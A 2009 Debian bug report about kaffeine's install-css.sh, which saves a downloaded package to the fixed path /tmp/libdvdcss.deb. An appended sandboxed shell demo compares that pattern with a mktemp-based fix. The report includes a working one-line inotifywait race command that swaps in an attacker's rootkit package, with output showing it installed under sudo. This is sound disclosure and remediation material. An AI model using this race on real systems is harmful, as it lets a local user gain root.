[Pkg-kde-extras] Bug#554772: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
Timo Juhani Lindfors
timo.lindfors at iki.fi
Fri Nov 6 12:09:54 UTC 2009
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security
Steps to reproduce:
1) Malice starts the following command in the background with the
privileges of her normal user account:
sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &
2) Malice calls the local administrator Trent and complains that she
can't watch DVDs.
3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs
sudo bash /usr/share/doc/kaffeine/install-css.sh
Expected results:
3) Code to decrypt DVDs is installed.
Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
rootkit.deb is installed:
$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46-- http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'
100%[=====================================>] 26,176 --.-K/s in 0.03s
2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]
(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...
-- System Information:
Debian Release: 5.0.3
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash
Versions of packages kaffeine depends on:
ii hdparm 8.9-3 tune hard disk parameters for high
ii kdelibs4c2a 4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii libc6 2.7-18 GNU C Library: Shared libraries
ii libcdparanoia0 3.10.2+debian-5 audio extraction tool for sampling
ii libgcc1 1:4.3.2-1.1 GCC support library
ii libogg0 1.1.3-4 Ogg Bitstream Library
ii libqt3-mt 3:3.3.8b-5 Qt GUI Library (Threaded runtime v
ii libstdc++6 4.3.2-1.1 The GNU Standard C++ Library v3
ii libvorbis0a 1.2.0.dfsg-3.1 The Vorbis General Audio Compressi
ii libvorbisenc2 1.2.0.dfsg-3.1 The Vorbis General Audio Compressi
ii libx11-6 2:1.1.5-2 X11 client-side library
ii libxcb1 1.1-1.2 X C Binding
ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar
ii libxine1 1.1.14-6 the xine video/media player librar
ii libxine1-ffmpeg 1.1.14-6 MPEG-related plugins for libxine1
ii libxine1-x 1.1.14-6 X desktop video output plugins for
ii libxinerama1 2:1.0.3-2 X11 Xinerama extension library
ii libxtst6 2:1.0.3-1 X11 Testing -- Resource extension
kaffeine recommends no packages.
kaffeine suggests no packages.
-- no debconf information
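The race described in the report, replayed as an added example that is not part of Timo's message or of the kaffeine package's install-css.sh. The download is stood in for by a local copy (`fetch_to`) and `dpkg -i` by a function that reports what it would install (`install_from`); the "package" contents, the attacker function `attacker_swap` and the scratch directory that plays the part of /tmp are all constructed here for the demo, so it runs offline and never touches the real /tmp. It contrasts the script's fixed path with a per-run directory from mktemp(1):

```shell
#!/bin/sh
# Added example, not the Debian install-css.sh script. Everything lives
# under one scratch directory so the demo is self-contained.
set -u

SANDBOX=$(mktemp -d) || exit 1
trap 'rm -rf "$SANDBOX"' EXIT
SHARED="$SANDBOX/tmp"          # stands in for the world-writable /tmp
mkdir -m 1777 "$SHARED"

# Constructed stand-ins: what Trent meant to install, and Malice's file.
printf 'libdvdcss2 genuine package\n' > "$SANDBOX/upstream.deb"
printf 'rootkit 0.1-1\n'            > "$SHARED/rootkit.deb"

# Stand-in for "wget -O PATH URL": copy the upstream file to PATH.
fetch_to() { cp "$SANDBOX/upstream.deb" "$1"; }

# Stand-in for "dpkg -i PATH": report the package that would be installed.
install_from() { head -n 1 "$1"; }

# Malice's side of the race, run at the moment inotifywait wakes up in
# the report (the download has landed, dpkg has not run yet). She only
# knows the predictable name the script uses, so that is the only
# place she can plant her file.
attacker_swap() {
    target="$SHARED/libdvdcss.deb"
    if [ -e "$target" ]; then
        rm -f "$target" && cp "$SHARED/rootkit.deb" "$target"
    fi
}

# Vulnerable pattern (what install-css.sh does): a fixed, predictable
# path in a directory every local user can write to.
vulnerable_install() {
    deb="$SHARED/libdvdcss.deb"
    fetch_to "$deb"
    attacker_swap            # interleaving forced for the demo
    install_from "$deb"
}

# Hardened pattern: a private directory with an unpredictable name and
# mode 0700, removed when done. Another user can neither pre-create the
# file nor replace it between download and install.
safe_install() {
    workdir=$(mktemp -d "$SHARED/install-css.XXXXXX") || return 1
    deb="$workdir/libdvdcss.deb"
    fetch_to "$deb"
    attacker_swap            # same attacker, same timing
    result=$(install_from "$deb")
    rm -rf "$workdir"
    printf '%s\n' "$result"
}

printf 'fixed path : %s\n' "$(vulnerable_install)"   # rootkit 0.1-1
printf 'mktemp dir : %s\n' "$(safe_install)"         # libdvdcss2 genuine package
```

In the real script the change is the same three lines: `workdir=$(mktemp -d) || exit 1`, `trap 'rm -rf "$workdir"' EXIT`, and `wget -O "$workdir/libdvdcss.deb" ...` followed by `dpkg -i` on that path. The demo runs both sides as one user, so it only exercises the unpredictable name; against a real second uid the 0700 mode of the mktemp directory is what stops the replacement. Testing whether /tmp/libdvdcss.deb already exists before downloading is not a fix, it only narrows the window the inotifywait trick exploits.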